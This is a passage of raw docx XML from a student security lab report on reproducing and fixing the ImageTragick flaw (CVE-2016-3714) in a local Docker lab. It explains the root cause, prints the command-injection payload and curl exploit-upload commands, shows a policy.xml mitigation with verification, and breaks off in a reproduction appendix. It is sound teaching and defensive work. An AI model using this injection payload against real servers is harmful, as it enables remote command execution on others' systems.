          <w:top w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142" w:right="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>"curl" -s -k -L -o "%o" "https:%M"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The %M placeholder is replaced with the attacker-controlled URL without escaping shell metacharacters. The payload supplies //127.0.0.1/oops.jpg"|touch /tmp/success" as the URL. After substitution the shell sees a closed quote after the URL, a pipe, the touch command and a final quote that balances the template. The delegate therefore runs both curl and touch. This is a command-injection and input-validation weakness in the delegate command construction, not in the PHP upload page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The upstream fix in ImageMagick 6.9.3-10 escapes shell metacharacters before the delegate command is built. The vulnerable image is pinned at 6.9.2-10, so the environment is affected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>4.5  Fix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The fix applied in this work is the hardening policy recommended by the ImageTragick advisory. It disables the dangerous coders (EPHEMERAL, URL, HTTPS, HTTP, FTP, MVG, MSL, TEXT, SHOW, WIN and PLT). The policy is mounted read-only over the policy file used by the image, so no image rebuild is required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:keepLines/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142" w:right="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>services:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  web:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    image: vulhub/imagemagick:6.9.2-10-php</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    command: php -t /var/www/html -S 0.0.0.0:8080</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    volumes:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">      - ./index.php:/var/www/html/index.php:ro</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">      - ./policy.xml:/usr/etc/ImageMagick-6/policy.xml:ro</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    ports:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">      - "8080:8080"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The fix files are committed in cve/CVE-2016-3714/fixed/docker-compose.yml and cve/CVE-2016-3714/fixed/policy.xml. An alternative production fix is to upgrade ImageMagick to 6.9.3-10 or later (or 7.0.1-1 or later).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>4.6  Verification after the fix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The fixed environment is started from the fixed directory. The policy is loaded and active, and the same payload is rejected before it reaches the delegate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:keepLines/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142" w:right="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>cd /mnt/e/MyFile/IS-Lab/Work-1/cve/CVE-2016-3714/fixed</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>docker compose up -d</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t># Same attack</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl -sS -X POST http://127.0.0.1:8080/ \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  -F "file_upload=@../exploit/1.gif;filename=1.gif;type=image/gif"</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>docker compose exec -T web ls -l /tmp/success</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t># ls: cannot access '/tmp/success': No such file or directory</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>docker compose logs --tail=1</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t># web-1 | identify: not authorized '/tmp/php...' @ error/constitute.c/ReadImage/412.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The marker file is not created, and the application log shows that ImageMagick refused to read the file because of the policy. The HTTP response remains 200, but the image size is empty because the file was not processed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="120" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2634430"/>
            <wp:docPr id="4" name="Picture 4"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="02-fixed-attack.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="2634430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 4 - Fixed environment: the same payload is blocked and /tmp/success is absent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>4.7  Regression test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>A legitimate 1x1 PNG file was uploaded to the fixed environment. The application still processed it and returned the image size, and no exploit marker was created. This shows that the policy blocks the malicious coder without breaking normal image handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:keepLines/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142" w:right="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl -sS -X POST http://127.0.0.1:8080/ \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  -F "file_upload=@../exploit/normal.png;filename=normal.png;type=image/png"</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t># HTTP=200</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t># Image size is: 1 x 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="120" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4320000" cy="2258083"/>
            <wp:docPr id="5" name="Picture 5"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="03-regression.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4320000" cy="2258083"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 5 - Regression test: a normal PNG upload still works after the fix.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>5.  Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The API implements the three required methods with parameterised SQL, output escaping, JWT authentication and bcrypt password hashing. The CI pipeline runs unit tests together with SAST (bandit) and SCA (safety and Snyk) on every push and uploads the reports as artifacts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The CVE-2016-3714 reproduction demonstrates a real remote command execution in ImageMagick. The root cause is the unescaped construction of the delegate command, which turns a crafted URL into a shell command. Disabling the dangerous coders with a read-only policy file blocks the attack, and the regression test confirms that normal image uploads continue to work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>6.  References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10: </w:t>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r>
          <w:rPr>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://owasp.org/www-project-top-ten/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Cheat Sheet Series: </w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r>
          <w:rPr>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT introduction: </w:t>
      </w:r>
      <w:hyperlink r:id="rId20">
        <w:r>
          <w:rPr>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://jwt.io/introduction</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub Actions documentation: </w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://docs.github.com/en/actions</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulhub: </w:t>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:rPr>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/vulhub/vulhub</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">NVD - CVE-2016-3714: </w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r>
          <w:rPr>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2016-3714</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">ImageTragick: </w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r>
          <w:rPr>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://imagetragick.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit-DB 39767: </w:t>
      </w:r>
      <w:hyperlink r:id="rId25">
        <w:r>
          <w:rPr>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/39767/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Work 1 source repository: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r>
          <w:rPr>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/EggplantPig/WeiLixuan23320107-IS-Work-1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE evidence and fix files: </w:t>
      </w:r>
      <w:hyperlink r:id="rId26">
        <w:r>
          <w:rPr>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/EggplantPig/WeiLixuan23320107-IS-Work-1/blob/main/cve/CVE-2016-3714/README.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Work 1 report (Markdown source): </w:t>
      </w:r>
      <w:hyperlink r:id="rId27">
        <w:r>
          <w:rPr>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/EggplantPig/WeiLixuan23320107-IS-Work-1/blob/main/report/Work-1-Report.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Appendix A.  Full Reproduction Command Sequence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>The following sequence reproduces the vulnerable state, the fixed state and the regression test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:keepLines/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142" w:right="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t># 1. Vulnerable environment</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>cd /home/EggplantPig/vulhub/imagemagick/CVE-2016-3714</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>docker compose up -d</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl -sS -X POST http://127.0.0.1:8080/ \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  -F "file_upload=@/mnt/e/MyFile/IS-Lab/Work-1/cve/CVE-2016-3714/exploit/1.gif;filename=1.gif;type=image/gif"</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>docker compose exec -T web ls -l /tmp/success</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>docker compose down</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t># 2. Fixed environment</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>cd /mnt/e/MyFile/IS-Lab/Work-1/cve/CVE-2016-3714/fixed</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>docker compose up -d</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl -sS -X POST http://127.0.0.1:8080/ \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  -F "file_upload=@/mnt/e/MyFile/IS-Lab/Work-1/cve/CVE-2016-3714/exploit/1.gif;filename=1.gif;type=image/gif"</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>docker compose exec -T web ls -l /tmp/success     # must not exist</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>docker compose logs --tail=1                       # identify: not authorized ...</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t># 3. Regression test</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl -sS -X POST http://127.0.0.1:8080/ \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
